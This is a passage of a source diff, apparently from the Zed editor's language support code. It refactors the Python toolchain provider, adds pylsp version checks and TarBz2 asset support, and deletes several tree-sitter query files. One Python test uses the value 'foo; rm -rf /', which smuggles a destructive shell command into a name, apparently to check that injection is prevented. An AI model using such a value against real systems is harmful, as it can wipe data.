@@ -1079,6 +1112,7 @@ fn python_env_kind_display(k: &PythonEnvironmentKind) -> &'static str { PythonEnvironmentKind::Venv => "venv", PythonEnvironmentKind::VirtualEnv => "virtualenv", PythonEnvironmentKind::VirtualEnvWrapper => "virtualenvwrapper", + PythonEnvironmentKind::WinPython => "WinPython", PythonEnvironmentKind::WindowsStore => "global (Windows Store)", PythonEnvironmentKind::WindowsRegistry => "global (Windows Registry)", PythonEnvironmentKind::Uv => "uv", @@ -1086,7 +1120,15 @@ fn python_env_kind_display(k: &PythonEnvironmentKind) -> &'static str { } } -pub(crate) struct PythonToolchainProvider; +pub(crate) struct PythonToolchainProvider { + fs: Arc, +} + +impl PythonToolchainProvider { + pub fn new(fs: Arc) -> Self { + Self { fs } + } +} static ENV_PRIORITY_LIST: &[PythonEnvironmentKind] = &[ // Prioritize non-Conda environments. @@ -1201,8 +1243,8 @@ impl ToolchainLister for PythonToolchainProvider { worktree_root: PathBuf, subroot_relative_path: Arc, project_env: Option>, - fs: &dyn Fs, ) -> ToolchainList { + let fs = &*self.fs; let env = project_env.unwrap_or_default(); let environment = EnvironmentApi::from_env(&env); let locators = pet::locators::create_locators( @@ -1333,8 +1375,8 @@ impl ToolchainLister for PythonToolchainProvider { &self, path: PathBuf, env: Option>, - fs: &dyn Fs, ) -> anyhow::Result { + let fs = &*self.fs; let env = env.unwrap_or_default(); let environment = EnvironmentApi::from_env(&env); let locators = pet::locators::create_locators( @@ -1377,12 +1419,9 @@ impl ToolchainLister for PythonToolchainProvider { match toolchain.environment.kind { Some(PythonEnvironmentKind::Conda) => { - let Some(manager_info) = &toolchain.environment.manager else { + if toolchain.environment.manager.is_none() { return vec![]; }; - if smol::fs::metadata(&manager_info.executable).await.is_err() { - return vec![]; - } let manager = match conda_manager { settings::CondaManager::Conda => "conda", @@ -1740,33 +1779,7 @@ impl LspAdapter for PyLspAdapter { symbol: &language::Symbol, language: &Arc, ) -> Option { - let name = &symbol.name; - let (text, filter_range, display_range) = match symbol.kind { - lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { - let text = format!("def {}():\n", name); - let filter_range = 4..4 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CLASS => { - let text = format!("class {}:", name); - let filter_range = 6..6 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CONSTANT => { - let text = format!("{} = 0", name); - let filter_range = 0..name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - _ => return None, - }; - Some(language::CodeLabel::new( - text[display_range.clone()].to_string(), - filter_range, - language.highlight_text(&text.as_str().into(), display_range), - )) + label_for_python_symbol(symbol, language) } async fn workspace_configuration( @@ -1848,6 +1861,17 @@ impl LspInstaller for PyLspAdapter { ) -> Option { if let Some(pylsp_bin) = delegate.which(Self::SERVER_NAME.as_ref()).await { let env = delegate.shell_env().await; + delegate + .try_exec(LanguageServerBinary { + path: pylsp_bin.clone(), + arguments: vec!["--version".into()], + env: Some(env.clone()), + }) + .await + .inspect_err(|err| { + log::warn!("failed to validate user-installed pylsp at {pylsp_bin:?}: {err:#}") + }) + .ok()?; Some(LanguageServerBinary { path: pylsp_bin, env: Some(env), @@ -1856,7 +1880,21 @@ impl LspInstaller for PyLspAdapter { } else { let toolchain = toolchain?; let pylsp_path = Path::new(toolchain.path.as_ref()).parent()?.join("pylsp"); - pylsp_path.exists().then(|| LanguageServerBinary { + if !pylsp_path.exists() { + return None; + } + delegate + .try_exec(LanguageServerBinary { + path: toolchain.path.to_string().into(), + arguments: vec![pylsp_path.clone().into(), "--version".into()], + env: None, + }) + .await + .inspect_err(|err| { + log::warn!("failed to validate toolchain pylsp at {pylsp_path:?}: {err:#}") + }) + .ok()?; + Some(LanguageServerBinary { path: toolchain.path.to_string().into(), arguments: vec![pylsp_path.into()], env: None, @@ -1972,6 +2010,7 @@ impl LspAdapter for BasedPyrightLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { // Provide minimal initialization options // Virtual environment configuration will be handled through workspace configuration @@ -1995,36 +2034,7 @@ impl LspAdapter for BasedPyrightLspAdapter { item: &lsp::CompletionItem, language: &Arc, ) -> Option { - let label = &item.label; - let label_len = label.len(); - let grammar = language.grammar()?; - let highlight_id = match item.kind? { - lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"), - lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"), - lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"), - lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"), - lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"), - _ => { - return None; - } - }; - let mut text = label.clone(); - if let Some(completion_details) = item - .label_details - .as_ref() - .and_then(|details| details.description.as_ref()) - { - write!(&mut text, " {}", completion_details).ok(); - } - Some(language::CodeLabel::filtered( - text, - label_len, - item.filter_text.as_deref(), - highlight_id - .map(|id| (0..label.len(), id)) - .into_iter() - .collect(), - )) + label_for_pyright_completion(item, language) } async fn label_for_symbol( @@ -2032,33 +2042,7 @@ impl LspAdapter for BasedPyrightLspAdapter { symbol: &Symbol, language: &Arc, ) -> Option { - let name = &symbol.name; - let (text, filter_range, display_range) = match symbol.kind { - lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => { - let text = format!("def {}():\n", name); - let filter_range = 4..4 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CLASS => { - let text = format!("class {}:", name); - let filter_range = 6..6 + name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - lsp::SymbolKind::CONSTANT => { - let text = format!("{} = 0", name); - let filter_range = 0..name.len(); - let display_range = 0..filter_range.end; - (text, filter_range, display_range) - } - _ => return None, - }; - Some(language::CodeLabel::new( - text[display_range.clone()].to_string(), - filter_range, - language.highlight_text(&text.as_str().into(), display_range), - )) + label_for_python_symbol(symbol, language) } async fn workspace_configuration( @@ -2543,7 +2527,7 @@ impl LspInstaller for RuffLspAdapter { } = latest_version; let destination_path = container_dir.join(format!("ruff-{name}")); let server_path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => destination_path + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => destination_path .join(Self::build_asset_name()?.0) .join("ruff"), AssetKind::Zip => destination_path.clone().join("ruff.exe"), @@ -2633,7 +2617,7 @@ impl LspInstaller for RuffLspAdapter { let path = last.context("no cached binary")?; let path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => { path.join(Self::build_asset_name()?.0).join("ruff") } AssetKind::Zip => path.join("ruff.exe"), @@ -2687,7 +2671,8 @@ mod tests { }); }); - let provider = PythonToolchainProvider; + let fs = project::FakeFs::new(cx.executor()); + let provider = PythonToolchainProvider::new(fs); let malicious_name = "foo; rm -rf /"; let manager_executable = std::env::current_exe().unwrap(); diff --git a/crates/languages/src/python/brackets.scm b/crates/languages/src/python/brackets.scm deleted file mode 100644 index 9e5b59788fc88fcb0830325417de50a9414828b8..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/brackets.scm +++ /dev/null @@ -1,4 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -(((string_start) @open (string_end) @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/python/debugger.scm b/crates/languages/src/python/debugger.scm deleted file mode 100644 index 807d6e865d2f60637f60b397ccc1a61fe3360fa1..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/debugger.scm +++ /dev/null @@ -1,43 +0,0 @@ -(identifier) @debug-variable -(#eq? @debug-variable "self") - -(assignment left: (identifier) @debug-variable) -(assignment left: (pattern_list (identifier) @debug-variable)) -(assignment left: (tuple_pattern (identifier) @debug-variable)) - -(augmented_assignment left: (identifier) @debug-variable) - -(for_statement left: (identifier) @debug-variable) -(for_statement left: (pattern_list (identifier) @debug-variable)) -(for_statement left: (tuple_pattern (identifier) @debug-variable)) - -(for_in_clause left: (identifier) @debug-variable) -(for_in_clause left: (pattern_list (identifier) @debug-variable)) -(for_in_clause left: (tuple_pattern (identifier) @debug-variable)) - -(as_pattern (identifier) @debug-variable) - -(binary_operator left: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(binary_operator right: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(comparison_operator (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(list (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(tuple (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) -(set (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(subscript value: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(attribute object: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(return_statement (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(parenthesized_expression (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(argument_list (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(if_statement condition: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(while_statement condition: (identifier) @debug-variable (#not-match? @debug-variable "^[A-Z]")) - -(block) @debug-scope -(module) @debug-scope diff --git a/crates/languages/src/python/imports.scm b/crates/languages/src/python/imports.scm deleted file mode 100644 index 7a1e2b225b9e310098f316c29fe6b1a27634bf12..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/imports.scm +++ /dev/null @@ -1,32 +0,0 @@ -(import_statement - name: [ - (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .) - (aliased_import - name: (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .)) - ]) @wildcard @import - -(import_from_statement - module_name: [ - (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .) - (relative_import - (dotted_name - ((identifier) @namespace ".")* - (identifier) @namespace .)?) - ] - (wildcard_import)? @wildcard - name: [ - (dotted_name - ((identifier) @namespace ".")* - (identifier) @name .) - (aliased_import - name: (dotted_name - ((identifier) @namespace ".")* - (identifier) @name .) - alias: (identifier) @alias) - ]?) @import diff --git a/crates/languages/src/python/outline.scm b/crates/languages/src/python/outline.scm deleted file mode 100644 index 70beb4e67585918ca1f893140ec79ee2428d47d7..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/outline.scm +++ /dev/null @@ -1,11 +0,0 @@ -(decorator) @annotation - -(class_definition - "class" @context - name: (identifier) @name - ) @item - -(function_definition - "async"? @context - "def" @context - name: (_) @name) @item diff --git a/crates/languages/src/python/runnables.scm b/crates/languages/src/python/runnables.scm deleted file mode 100644 index 1c7e76d73be2357c71ac2f3adf41b14db969e262..0000000000000000000000000000000000000000 --- a/crates/languages/src/python/runnables.scm +++ /dev/null @@ -1,151 +0,0 @@ -; subclasses of unittest.TestCase or TestCase -( - (class_definition - name: (identifier) @run @_unittest_class_name - superclasses: (argument_list - [(identifier) @_superclass - (attribute (identifier) @_superclass)] - ) - (#eq? @_superclass "TestCase") - ) @_python-unittest-class - (#set! tag python-unittest-class) - ) - -; test methods whose names start with `test` in a TestCase -( - (class_definition - name: (identifier) @_unittest_class_name - superclasses: (argument_list - [(identifier) @_superclass - (attribute (identifier) @_superclass)] - ) - (#eq? @_superclass "TestCase") - body: (block - (function_definition - name: (identifier) @run @_unittest_method_name - (#match? @_unittest_method_name "^test.*") - ) @_python-unittest-method - (#set! tag python-unittest-method) - ) - ) - ) - -; pytest functions -( - (module - (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) @_python-pytest-method - ) - (#set! tag python-pytest-method) - ) - -; decorated pytest functions -( - (module - (decorated_definition - (decorator)+ @_decorator - definition: (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) - ) @_python-pytest-method - ) - (#set! tag python-pytest-method) - ) - - -; pytest classes -( - (module - (class_definition - name: (identifier) @run @_pytest_class_name - (#match? @_pytest_class_name "^Test") - ) - (#set! tag python-pytest-class) - ) - ) - - -; decorated pytest classes -( - (module - (decorated_definition - (decorator)+ @_decorator - definition: (class_definition - name: (identifier) @run @_pytest_class_name - (#match? @_pytest_class_name "^Test") - ) - ) - (#set! tag python-pytest-class) - ) - ) - - -; pytest class methods -( - (module - (class_definition - name: (identifier) @_pytest_class_name - (#match? @_pytest_class_name "^Test") - body: (block - [(decorated_definition - (decorator)+ @_decorator - definition: (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) - ) - (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test") - ) - ] @_python-pytest-method) - (#set! tag python-pytest-method) - ) - ) - ) - -; decorated pytest class methods -( - (module - (decorated_definition - (decorator)+ @_decorator - definition: (class_definition - name: (identifier) @_pytest_class_name - (#match? @_pytest_class_name "^Test") - body: (block - [(decorated_definition - (decorator)+ @_decorator - definition: (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test_") - ) - ) - (function_definition - name: (identifier) @run @_pytest_method_name - (#match? @_pytest_method_name "^test") - ) - ] @_python-pytest-method) - (#set! tag python-pytest-method) - ) - ) - ) - ) - -; module main method -( - (module - (if_statement - condition: (comparison_operator - (identifier) @run @_lhs - operators: "==" - (string) @_rhs - ) - (#eq? @_lhs "__name__") - (#match? @_rhs "^[\"']__main__[\"']$") - (#set! tag python-module-main-method) - ) - ) - ) diff --git a/crates/languages/src/regex/brackets.scm b/crates/languages/src/regex/brackets.scm deleted file mode 100644 index 191fd9c084a52eced37428281971ff9e569a4932..0000000000000000000000000000000000000000 --- a/crates/languages/src/regex/brackets.scm +++ /dev/null @@ -1,3 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) diff --git a/crates/languages/src/rust.rs b/crates/languages/src/rust.rs index e463a6c62dd6a0625c8ee7c6d314b296b881157e..d92c1392c128ed72b6e2972bc54dcf7dfc152b1e 100644 --- a/crates/languages/src/rust.rs +++ b/crates/languages/src/rust.rs @@ -3,7 +3,7 @@ use async_trait::async_trait; use collections::HashMap; use futures::StreamExt; use futures::lock::OwnedMutexGuard; -use gpui::{App, AppContext, AsyncApp, SharedString, Task}; +use gpui::{App, AppContext, AsyncApp, Entity, SharedString, Task}; use http_client::github::AssetKind; use http_client::github::{GitHubLspBinaryVersion, latest_github_release}; use http_client::github_download::{GithubBinaryMetadata, download_server_binary}; @@ -31,11 +31,10 @@ use util::merge_json_value_into; use util::rel_path::RelPath; use util::{ResultExt, maybe}; -use crate::LanguageDir; -use crate::language_settings::language_settings; +use crate::language_settings::LanguageSettings; pub(crate) fn semantic_token_rules() -> SemanticTokenRules { - let content = LanguageDir::get("rust/semantic_token_rules.json") + let content = grammars::get_file("rust/semantic_token_rules.json") .expect("missing rust/semantic_token_rules.json"); let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules"); settings::parse_json_with_comments::(json) @@ -202,6 +201,7 @@ impl RustLspAdapter { async fn build_asset_name() -> String { let extension = match Self::GITHUB_ASSET_KIND { AssetKind::TarGz => "tar.gz", + AssetKind::TarBz2 => "tar.bz2", AssetKind::Gz => "gz", AssetKind::Zip => "zip", }; @@ -262,12 +262,7 @@ impl LspAdapter for RustLspAdapter { Some("rust-analyzer/flycheck".into()) } - fn process_diagnostics( - &self, - params: &mut lsp::PublishDiagnosticsParams, - _: LanguageServerId, - _: Option<&'_ Buffer>, - ) { + fn process_diagnostics(&self, params: &mut lsp::PublishDiagnosticsParams, _: LanguageServerId) { static REGEX: LazyLock = LazyLock::new(|| Regex::new(r"(?m)`([^`]+)\n`$").expect("Failed to create REGEX")); @@ -706,7 +701,7 @@ impl LspInstaller for RustLspAdapter { } = version; let destination_path = container_dir.join(format!("rust-analyzer-{name}")); let server_path = match Self::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => destination_path.clone(), // Tar and gzip extract in place. + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => destination_path.clone(), // Tar and gzip extract in place. AssetKind::Zip => destination_path.clone().join("rust-analyzer.exe"), // zip contains a .exe }; @@ -898,23 +893,16 @@ impl ContextProvider for RustContextProvider { fn associated_tasks( &self, - file: Option>, + buffer: Option>, cx: &App, ) -> Task> { const DEFAULT_RUN_NAME_STR: &str = "RUST_DEFAULT_PACKAGE_RUN"; const CUSTOM_TARGET_DIR: &str = "RUST_TARGET_DIR"; - let language_sets = language_settings(Some("Rust".into()), file.as_ref(), cx); - let package_to_run = language_sets - .tasks - .variables - .get(DEFAULT_RUN_NAME_STR) - .cloned(); - let custom_target_dir = language_sets - .tasks - .variables - .get(CUSTOM_TARGET_DIR) - .cloned(); + let language = LanguageName::new_static("Rust"); + let settings = LanguageSettings::resolve(buffer.map(|b| b.read(cx)), Some(&language), cx); + let package_to_run = settings.tasks.variables.get(DEFAULT_RUN_NAME_STR).cloned(); + let custom_target_dir = settings.tasks.variables.get(CUSTOM_TARGET_DIR).cloned(); let run_task_args = if let Some(package_to_run) = package_to_run { vec!["run".into(), "-p".into(), package_to_run] } else { @@ -1280,8 +1268,8 @@ async fn get_cached_server_binary(container_dir: PathBuf) -> Option return Ok(None), }; let path = match RustLspAdapter::GITHUB_ASSET_KIND { - AssetKind::TarGz | AssetKind::Gz => path, // Tar and gzip extract in place. - AssetKind::Zip => path.join("rust-analyzer.exe"), // zip contains a .exe + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Gz => path, // Tar and gzip extract in place. + AssetKind::Zip => path.join("rust-analyzer.exe"), // zip contains a .exe }; anyhow::Ok(Some(LanguageServerBinary { @@ -1364,7 +1352,7 @@ mod tests { }, ], }; - RustLspAdapter.process_diagnostics(&mut params, LanguageServerId(0), None); + RustLspAdapter.process_diagnostics(&mut params, LanguageServerId(0)); assert_eq!(params.diagnostics[0].message, "use of moved value `a`"); @@ -1554,10 +1542,10 @@ mod tests { "await.as_deref_mut(&mut self) -> IterMut<'_, T>".to_string(), 6..18, vec![ - (6..18, HighlightId(2)), - (20..23, HighlightId(1)), - (33..40, HighlightId(0)), - (45..46, HighlightId(0)) + (6..18, HighlightId::new(2)), + (20..23, HighlightId::new(1)), + (33..40, HighlightId::new(0)), + (45..46, HighlightId::new(0)) ], )) ); @@ -1584,12 +1572,12 @@ mod tests { "pub fn as_deref_mut(&mut self) -> IterMut<'_, T>".to_string(), 7..19, vec![ - (0..3, HighlightId(1)), - (4..6, HighlightId(1)), - (7..19, HighlightId(2)), - (21..24, HighlightId(1)), - (34..41, HighlightId(0)), - (46..47, HighlightId(0)) + (0..3, HighlightId::new(1)), + (4..6, HighlightId::new(1)), + (7..19, HighlightId::new(2)), + (21..24, HighlightId::new(1)), + (34..41, HighlightId::new(0)), + (46..47, HighlightId::new(0)) ], )) ); @@ -1610,7 +1598,7 @@ mod tests { Some(CodeLabel::new( "inner_value: String".to_string(), 6..11, - vec![(0..11, HighlightId(3)), (13..19, HighlightId(0))], + vec![(0..11, HighlightId::new(3)), (13..19, HighlightId::new(0))], )) ); @@ -1637,8 +1625,8 @@ mod tests { vec![ (10..13, HighlightId::TABSTOP_INSERT_ID), (16..19, HighlightId::TABSTOP_INSERT_ID), - (0..7, HighlightId(2)), - (7..8, HighlightId(2)), + (0..7, HighlightId::new(2)), + (7..8, HighlightId::new(2)), ], )) ); @@ -1665,8 +1653,8 @@ mod tests { 0..4, vec![ (5..9, HighlightId::TABSTOP_REPLACE_ID), - (0..3, HighlightId(2)), - (3..4, HighlightId(2)), + (0..3, HighlightId::new(2)), + (3..4, HighlightId::new(2)), ], )) ); @@ -1694,8 +1682,8 @@ mod tests { vec![ (7..10, HighlightId::TABSTOP_REPLACE_ID), (13..16, HighlightId::TABSTOP_INSERT_ID), - (0..2, HighlightId(1)), - (3..6, HighlightId(1)), + (0..2, HighlightId::new(1)), + (3..6, HighlightId::new(1)), ], )) ); @@ -1723,8 +1711,8 @@ mod tests { vec![ (4..8, HighlightId::TABSTOP_REPLACE_ID), (12..16, HighlightId::TABSTOP_REPLACE_ID), - (0..3, HighlightId(1)), - (9..11, HighlightId(1)), + (0..3, HighlightId::new(1)), + (9..11, HighlightId::new(1)), ], )) ); diff --git a/crates/languages/src/rust/brackets.scm b/crates/languages/src/rust/brackets.scm deleted file mode 100644 index 7a35adb10021c83b8e08e888187ab133c5313ad9..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/brackets.scm +++ /dev/null @@ -1,7 +0,0 @@ -("(" @open ")" @close) -("[" @open "]" @close) -("{" @open "}" @close) -("<" @open ">" @close) -(closure_parameters "|" @open "|" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/rust/debugger.scm b/crates/languages/src/rust/debugger.scm deleted file mode 100644 index 5347413f698083287b9bedd25f4732d24fbbf76e..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/debugger.scm +++ /dev/null @@ -1,50 +0,0 @@ -(metavariable) @debug-variable - -(parameter (identifier) @debug-variable) - -(self) @debug-variable - -(static_item (identifier) @debug-variable) -(const_item (identifier) @debug-variable) - -(let_declaration pattern: (identifier) @debug-variable) - -(let_condition (identifier) @debug-variable) - -(match_arm (identifier) @debug-variable) - -(for_expression (identifier) @debug-variable) - -(closure_parameters (identifier) @debug-variable) - -(assignment_expression (identifier) @debug-variable) - -(field_expression (identifier) @debug-variable) - -(binary_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(reference_expression (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(array_expression (identifier) @debug-variable) -(tuple_expression (identifier) @debug-variable) -(return_expression (identifier) @debug-variable) -(await_expression (identifier) @debug-variable) -(try_expression (identifier) @debug-variable) -(index_expression (identifier) @debug-variable) -(range_expression (identifier) @debug-variable) -(unary_expression (identifier) @debug-variable) - -(if_expression (identifier) @debug-variable) -(while_expression (identifier) @debug-variable) - -(parenthesized_expression (identifier) @debug-variable) - -(arguments (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]")) - -(macro_invocation (token_tree (identifier) @debug-variable - (#not-match? @debug-variable "^[A-Z]"))) - -(block) @debug-scope diff --git a/crates/languages/src/rust/imports.scm b/crates/languages/src/rust/imports.scm deleted file mode 100644 index 3ce6a4f073506dd4d27320a7fd5bb547927f9c1a..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/imports.scm +++ /dev/null @@ -1,27 +0,0 @@ -(use_declaration) @import - -(scoped_use_list - path: (_) @namespace - list: (_) @list) - -(scoped_identifier - path: (_) @namespace - name: (identifier) @name) - -(use_list (identifier) @name) - -(use_declaration (identifier) @name) - -(use_as_clause - path: (scoped_identifier - path: (_) @namespace - name: (_) @name) - alias: (_) @alias) - -(use_as_clause - path: (identifier) @name - alias: (_) @alias) - -(use_wildcard - (_)? @namespace - "*" @wildcard) diff --git a/crates/languages/src/rust/indents.scm b/crates/languages/src/rust/indents.scm deleted file mode 100644 index 9ab6b029083fd5d8e3249916c00a5f90648eb3e2..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/indents.scm +++ /dev/null @@ -1,14 +0,0 @@ -[ - ((where_clause) _ @end) - (field_expression) - (call_expression) - (assignment_expression) - (let_declaration) - (let_chain) - (await_expression) -] @indent - -(_ "[" "]" @end) @indent -(_ "<" ">" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent diff --git a/crates/languages/src/rust/injections.scm b/crates/languages/src/rust/injections.scm deleted file mode 100644 index 88df78d793c5666492b0f3917d78b4210be5e094..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/injections.scm +++ /dev/null @@ -1,64 +0,0 @@ -([ - (line_comment) - (block_comment) -] @injection.content - (#set! injection.language "comment")) - -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (#not-any-of? @_macro_name "view" "html") - (token_tree) @injection.content - (#set! injection.language "rust")) - -; we need a better way for the leptos extension to declare that -; it wants to inject inside of rust, instead of modifying the rust -; injections to support leptos injections -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (#any-of? @_macro_name "view" "html") - (token_tree) @injection.content - (#set! injection.language "rstml") - ) - -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (#any-of? @_macro_name "sql") - (_) @injection.content - (#set! injection.language "sql") - ) - -; lazy_regex -(macro_invocation - macro: [ - ((identifier) @_macro_name) - (scoped_identifier (identifier) @_macro_name .) - ] - (token_tree [ - (string_literal (string_content) @injection.content) - (raw_string_literal (string_content) @injection.content) - ]) - (#set! injection.language "regex") - (#any-of? @_macro_name "regex" "bytes_regex") -) - -(call_expression - function: (scoped_identifier) @_fn_path - arguments: (arguments - [ - (string_literal (string_content) @injection.content) - (raw_string_literal (string_content) @injection.content) - ] - ) - - (#match? @_fn_path ".*Regex(Builder)?::new") - (#set! injection.language "regex") -) diff --git a/crates/languages/src/rust/outline.scm b/crates/languages/src/rust/outline.scm deleted file mode 100644 index a99f53dd2b3154aa3717f67fd683da4a8b57d31b..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/outline.scm +++ /dev/null @@ -1,73 +0,0 @@ -(attribute_item) @annotation -(line_comment) @annotation - -(struct_item - (visibility_modifier)? @context - "struct" @context - name: (_) @name) @item - -(enum_item - (visibility_modifier)? @context - "enum" @context - name: (_) @name) @item - -(enum_variant - (visibility_modifier)? @context - name: (_) @name) @item - -(impl_item - "impl" @context - trait: (_)? @name - "for"? @context - type: (_) @name - body: (_ . "{" @open "}" @close .)) @item - -(trait_item - (visibility_modifier)? @context - "trait" @context - name: (_) @name) @item - -(function_item - (visibility_modifier)? @context - (function_modifiers)? @context - "fn" @context - name: (_) @name - body: (_ . "{" @open "}" @close .)) @item - -(function_signature_item - (visibility_modifier)? @context - (function_modifiers)? @context - "fn" @context - name: (_) @name) @item - -(macro_definition - . "macro_rules!" @context - name: (_) @name) @item - -(mod_item - (visibility_modifier)? @context - "mod" @context - name: (_) @name) @item - -(type_item - (visibility_modifier)? @context - "type" @context - name: (_) @name) @item - -(associated_type - "type" @context - name: (_) @name) @item - -(const_item - (visibility_modifier)? @context - "const" @context - name: (_) @name) @item - -(static_item - (visibility_modifier)? @context - "static" @context - name: (_) @name) @item - -(field_declaration - (visibility_modifier)? @context - name: (_) @name) @item diff --git a/crates/languages/src/rust/runnables.scm b/crates/languages/src/rust/runnables.scm deleted file mode 100644 index 7c1571614424161ec866f5fa2607ea55975500e2..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/runnables.scm +++ /dev/null @@ -1,92 +0,0 @@ -; Rust mod test -( - (attribute_item (attribute - ( - (identifier) @_attribute) - arguments: ( - (token_tree (identifier) @_test) - (#eq? @_test "test") - ) - ) - (#eq? @_attribute "cfg") - ) - . - (mod_item - name: (_) @run - ) - (#set! tag rust-mod-test) -) - -; Rust test -( - ( - (attribute_item (attribute - [((identifier) @_attribute) - (scoped_identifier (identifier) @_attribute) - ]) - (#match? @_attribute "test") - ) @_start - . - (attribute_item) * - . - [(line_comment) (block_comment)] * - . - (function_item - name: (_) @run @_test_name - body: _ - ) @_end - ) - (#set! tag rust-test) -) - -; Rust doc test -( - ( - (line_comment) * - (line_comment - doc: (_) @_comment_content - ) @_start @run - (#match? @_comment_content "```") - . - (line_comment) * - . - (line_comment - doc: (_) @_end_comment_content - ) @_end_code_block - (#match? @_end_comment_content "```") - . - (line_comment) * - (attribute_item) * - . - [(function_item - name: (_) @_doc_test_name - body: _ - ) (function_signature_item - name: (_) @_doc_test_name - ) (struct_item - name: (_) @_doc_test_name - ) (enum_item - name: (_) @_doc_test_name - body: _ - ) ( - (attribute_item) ? - (macro_definition - name: (_) @_doc_test_name) - ) (mod_item - name: (_) @_doc_test_name - )] @_end - ) - (#set! tag rust-doc-test) -) - -; Rust main function -( - ( - (function_item - name: (_) @run - body: _ - ) @_rust_main_function_end - (#eq? @run "main") - ) - (#set! tag rust-main) -) diff --git a/crates/languages/src/rust/textobjects.scm b/crates/languages/src/rust/textobjects.scm deleted file mode 100644 index 4e7e7fa0cd1ba4393bc99998e38e940f751aef97..0000000000000000000000000000000000000000 --- a/crates/languages/src/rust/textobjects.scm +++ /dev/null @@ -1,51 +0,0 @@ -; functions -(function_signature_item) @function.around - -(function_item - body: (_ - "{" - (_)* @function.inside - "}" )) @function.around - -; classes -(struct_item - body: (_ - ["{" "("]? - [(_) ","?]* @class.inside - ["}" ")"]? )) @class.around - -(enum_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(union_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(trait_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(impl_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(mod_item - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -; comments - -(line_comment)+ @comment.around - -(block_comment) @comment.around diff --git a/crates/languages/src/tailwind.rs b/crates/languages/src/tailwind.rs index 72e4684ce0a0242e5381c118a9748e3d9718341d..c78790b74c81c9a7fce89425f4499d41f343189e 100644 --- a/crates/languages/src/tailwind.rs +++ b/crates/languages/src/tailwind.rs @@ -139,6 +139,7 @@ impl LspAdapter for TailwindLspAdapter { async fn initialization_options( self: Arc, _: &Arc, + _: &mut AsyncApp, ) -> Result> { Ok(Some(json!({ "provideFormatter": 